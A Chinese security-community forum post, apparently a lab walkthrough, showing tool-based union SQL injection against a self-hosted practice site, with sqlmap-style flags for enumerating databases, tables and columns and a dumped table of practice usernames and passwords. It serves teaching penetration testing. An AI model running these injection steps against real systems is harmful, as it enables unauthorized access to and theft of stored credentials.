深信服社区»版块 区域群组 云贵区 SQL注入实战讲解分享 联合注入----工具篇 ...

SQL注入实战讲解分享 联合注入----工具篇

查看数: 3022 | 评论数: 2 | 收藏 0
关灯 | 提示:支持键盘翻页<-左 右->
    组图打开中,请稍候......
发布时间: 2025-2-20 11:10

正文摘要:

免责说明: 1. 目的 本免责声明旨在明确渗透测试的范围、责任及限制,确保测试在法律和合同框架内进行。 2. 授权 渗透测试必须在客户明确授权后进行,未经许可的测试将被视为非法行为。 3. 范围 测试仅限于客户指定 ...

回复

王老师 发表于 2025-6-2 18:59

免责说明:

1. 目的
本免责声明旨在明确渗透测试的范围、责任及限制,确保测试在法律和合同框架内进行。
2. 授权
渗透测试必须在客户明确授权后进行,未经许可的测试将被视为非法行为。
3. 范围
测试仅限于客户指定的系统和网络,不得超出授权范围。


本次实验网站  是 自己搭建!!!!!!!!!!!!!!!!!!!!






上期我们讲了 手工,这次我们来试试工具



1.打开我们的工具,输入网站 看看有没有漏洞




2.发现有联合注入




3.--current-db  获取当前的数据库名:security




--dbs          获取当前所有的数据库名




4.--dbms=mysql -D "security " --tables          获取security 数据库中 所有的列名



+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+


5.-D security  -T users    --columns



+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id             |      int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+


6.猜username 和 password  里面有啥



+----+----------+------------+
| id | username | password   |
+----+----------+------------+
| 1  | Dumb     | Dumb       |
| 2  | Angelina | I-kill-you |
| 3  | Dummy    | p@ssword   |
| 4  | secure   | crappy     |
| 5  | stupid   | stupidity  |
| 6  | superman | genious    |
| 7  | batman   | mob!le     |
| 8  | admin    | admin      |
| 9  | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
任廷方 发表于 2025-2-20 11:13
感谢分享,学习一下